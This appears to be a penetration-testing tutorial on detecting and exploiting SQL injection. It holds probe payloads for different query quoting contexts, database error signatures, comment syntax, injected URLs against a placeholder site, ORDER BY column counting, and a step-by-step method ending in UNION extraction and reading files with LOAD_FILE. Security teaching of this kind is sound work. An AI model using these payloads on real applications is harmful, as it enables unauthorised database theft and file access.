🏆Finding the SQL injection

-------------------------------------------------------------

How to to generate Errors

select * from table_name where id=23
select * from table_name where id='23'
select * from table_name where id="23"
select * from table_name where id=(23)
select * from table_name where id=('23')
select * from table_name where id=("23")

❗ Information IMPORTANT ❗

Information Remember whenever the input is enclosed with single quotes only single quote with input will create error.

When input is enlcosed by double quotes a double qoute with input will give error.

When Input is not enlcosed with anything single quote and double quote both will give error.

First of all we can try our input with some injections to see if we get any error. Error may always not be real SQL error it may be some times generic error or change in output of the application. All you have to do it recognise it.

-------------------------------------------------------------

Confirm test for Not enclosed Intiger input query

Perform these tests and check the reactions of the Application:

select * from table_name where id=23

Input	Reaction if its Intiger Based Injection
23'	It should cause error or no output
23"	Should cause error or no output
23 or 1=1	Any Output should come but may be different output
23 and 1=1	Same output should come
23 and false	No output
23 and true	Same Output
23--+	Same output. I used --+ to comment, later i ll show how to know which one to use
23 and true--+	Same output

-------------------------------------------------------------

Confirm test for Single quote enclosed Intiger input query

Perform these tests and check the reactions of the Application:

select * from table_name where id='23'

Input	Reaction if its Single Qoute Based Injection
23'	It should cause error or no output
23"	No error Same output
23' or '1'='1	Any Output should come but may be different output
23' and '1'='1	Same output should come
23' and false--+	No output
23' and true--+	Same Output

-------------------------------------------------------------

Confirm test for Double quote enclosed Intiger input query

Perform these tests and check the reactions of the Application:

select * from table_name where id="23"

Input	Reaction if its Double Qoute Based Injection
23'	No error Same output
23"	>It should cause error or no output
23" or "1"="1	Any Output should come but may be different output
23" and "1"="1	Same output should come
23" and false--+	No output
23" and true--+	Same Output

-------------------------------------------------------------

Confirm test for Bracket quote enclosed Intiger input query

Perform these tests and check the reactions of the Application:

select * from table_name where id=(23)

Input	Reaction if its Intiger Based Bracket enclosed Injection
23'	It should cause error or no output
"	Should cause error or no output
23 or 1=1	Output should come but may be different output
23 and 1=1	Output should come but may be different output
23 and false	No output
23 and true	Same Output
23--+	Error or No output. Here you can understand that any Bracket is used
23)--+	Same output
23) and false--+	No output
23) and true--+	Same output

-------------------------------------------------------------

Confirm test for Bracket enclosed Single Quote Intiger input query

Perform these tests and check the reactions of the Application:

select * from table_name where id=('23')

Input	Reaction if its bracket enclosed Single Quote based Injection
23'	It should cause error or no output
23"	No error Same output
23' or '1'='1	Any Output should come but may be different output
23' and '1'='1	Any Output should come but may be different output
23' and false--+	No output or error
23' and true--+	No output or error
23') and False--+	No output
23') and true--+	Same Output
23') or true--+	Output will come but may be different

-------------------------------------------------------------

Confirm test for Bracket enclosed Double Quote Intiger input query

Perform these tests and check the reactions of the Application:

select * from table_name where id=("23")

Input	Reaction if its bracket enclosed Double Quote based Injection
23'	No error Same output
23"	Error or No output
23" or "1"="1	Any Output should come but may be different output
23" and "1"="1	Any Output should come but may be different output
23" and false--+	No output or error
23" and true--+	No output or error
23") and False--+	No output
23") and true--+	Same Output
23") or true--+	Output will come but may be different

-------------------------------------------------------------

Error may always not be real SQL error it may be some times generic error or change in output of the application.

All you have to do it recognise it.

MySQL Error Style:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

MSSQL ASPX Error:

Server Error in '/' Application

MSAccess (Apache PHP):

Fatal error: Uncaught exception 'com_exception' with message Source: Microsoft JET Database Engine

MSAccesss (IIS ASP):

Microsoft JET Database Engine error '80040e14'

Oracle Error:

ORA-00933: SQL command not properly ended

ODBC Error:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

PostgreSQL Error:

PSQLException: ERROR: unterminated quoted string at or near "'" Position: 1orQuery failed: ERROR: syntax error at or near
"'" at character 56 in /www/site/test.php on line 121.

MS SQL Server: Error:

Microsoft SQL Native Client error %u201880040e14%u2019Unclosed quotation mark after the 

-------------------------------------------------------------

Different types of comments used in SQLi.

Comment	Name
--	MySQL Linux Style
--+	MySQL Windows Style
#	Hash (URL encode while use)
--+-	SQL Comment
;%00	Null Byte
`	Backtick
%23	Hash (URL encode)
;	Use for End of Query
/*	Multiple-line comment

While using # as comment type always remember to URL encode # to %23

-------------------------------------------------------------

How can we check for which comment to use

injection	If it gives same Output as 23 was giving then
http://fakesite.com/report.php?id=23--	Its intiger type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23'--	Its Single quote type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23"--	Its Double quote type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23)--	Its intiger type with bracket injection and '--' can be used as comment
http://fakesite.com/report.php?id=23')--	Its Single quote with bracket type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23")--	Its Double quote with bracket type injection and '--' can be used as comment

So as i showed above test for '--' type comment in the same manner you can check for all commenting types and the one which gives same output as giving with Normal Output then that can help you understand the type of internal query alongwith the comment that you can use.

-------------------------------------------------------------

Understand the basics of injecting:

Any time anywhere or any application where ever and whenever you are injecting there are following three basic rules of injecting [1]. Balance. [2]. Inject. [3]. Commenting.

Understanding the first phase "Balance":

In this phase we balance the internal query, for example after reading knowldge we understand that how can we assume and figure out the internal query used by the application where your input is injected. Lets say we figured out that out internal query is "Select * from tablename where id=('23')" so in this case our balance input should be 23').

The phase of Injection:

In this phase we inject as per our requirement, and the type of injection we are doing.

The phase of Commenting:

Then the last part of commenting, which we already know. Now check the below image which will show you all the three parts on injection.

-------------------------------------------------------------

'Order By' as we know if we give order by a number more than the number under the query, then it will throw an error. So we can easily understand that we can use order by to know how many columns we have inside the query

URL Injection	Internal Query	Output
http://fakesite.com/report.php?id=23 order by 10--+	Select * from tablename where id=23 order by 10	Error (then reduce)
http://fakesite.com/report.php?id=23 order by 1--+	Select * from tablename where id=23 order by 1	Working (then increse)

-------------------------------------------------------------

-------------------------------------------------------------

Methodology

SQL Injection points:

• In the parameter field (ex: page.php?login=<payload>)

• Directly in a parameter (ex: page.php?<payload>=...)

• In the path (ex: page<payload>/)

• In the header (user-agent:, referer:, cookies:)

-------------------------------------------------------------

Method 1:

1. Attempt to generate an error with an invalid input or a special character indicating the presence of an injection possibility

2. Find the total number of columns in the table with the "ORDER BY" and "GROUP BY" commands

3. Find vulnerable columns with "UNION" operators

4. Extract basic information such as database(), version(), user(), uuid() with "CONCAT()" or "GROUP_CONCAT()"

5. Extract the complete tables with the column names (extract as much information as possible with the "GROUP_CONCAT()" command

6. Check privileges for files with "FILE_PRIV"

7. Access the system with the "LOAD FILE()" command

-------------------------------------------------------------